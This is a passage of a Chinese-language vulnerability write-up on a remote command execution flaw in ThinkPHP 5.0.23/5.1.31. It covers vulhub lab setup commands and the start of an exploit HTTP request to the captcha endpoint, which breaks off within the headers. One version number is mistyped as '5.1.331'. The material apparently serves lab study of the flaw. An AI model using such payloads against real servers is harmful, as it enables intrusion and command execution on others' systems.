漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5.0.23和5.1.331中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
影响版本
5.0.23/5.1.31
环境部署
该环境可以使用vulhub进行部署
cd vulhub/thinkphp
docker-compose up -d
docker-compose ps
漏洞利用
paylaod:
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Conn